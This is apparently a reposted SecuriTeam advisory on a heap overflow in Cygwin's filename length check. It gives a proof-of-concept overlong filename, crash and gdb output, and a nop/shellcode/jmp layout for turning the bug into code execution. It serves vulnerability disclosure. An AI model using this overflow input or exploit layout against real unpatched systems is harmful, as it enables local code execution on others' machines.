- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Cygwin Buffer Overflow in Filename Length Check
------------------------------------------------------------------------
SUMMARY
Cygwin is "a Linux-like environment for Windows which consists in a dll
binary (cygwin1.dll) whichs emulates Linux api, and a set of tools which
provide Linux look and feel". A vulnerability in Cygwin's filename length
checking mechanism allows local attackers to overflow an internal buffer
and cause the execution of arbitrary code.
DETAILS
Vulnerable Systems:
* cygwin1.dll version up to 1.5.7.
Immune Systems:
* cygwin1.dll version 1.5.24
Traditionally, linux filesystem allow 255 bytes long, nevertheless cygwin
allow 239 bytes and there is a check that prevents filenames equal or
major than 240.
In spite of the check, there is a 232 bytes long dynamic memory buffer
where is stored the filename, so that is possible make a evil filename
with 233-239 bytes long that bypasses the check and overflows the heap
maximum 7 bytes.
So you had to penetrate in machine and put the evil-file and then 7 bytes
of the private heap and ebx and edi registers are for the exploit.
The following file has to be uploaded, if we use touch to create it,
cygwin will be bofed.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABB
BBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTT
TTUUUUVVVVWWWWXXXXYYYY
..
$ cat scp.exe.stackdump
Exception: STATUS_ACCESS_VIOLATION at eip=6109008D
eax=6167343A ebx=5959595A ecx=6167343C edx=04A96F89 esi=6E6C0055
edi=59595957
ebp=6E6C006C esp=0022E51B program=C:\sshd\bin\scp.exe
cs=001B ds=0023 es=0023 fs=0038 gs=0000 ss=0023
$ gdb /usr/bin/touch.exe
GNU gdb 2003-09-20-cvs (cygwin-special)
..
(gdb) r AAAA ...
Program received signal SIGSEGV, Segmentation fault.
0x61091eea in getppid () from /usr/bin/cygwin1.dll
(gdb) x/i 0x61091eea
0x61091eea <getppid+2954>: mov 0xc(%ebp),%eax
(gdb) i r ebp eax
ebp 0x22006b 0x22006b
eax 0xffffffff -1
filename: [nops][shellcode][jmp][buff]
nops + shellcode = 210 bytes
jmp = 4 bytes
buff = 24 bytes
ADDITIONAL INFORMATION
The information has been provided by <mailto:advisories@isecauditors.com>
Jesus Olmos Gonzalez.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
No comments:
Post a Comment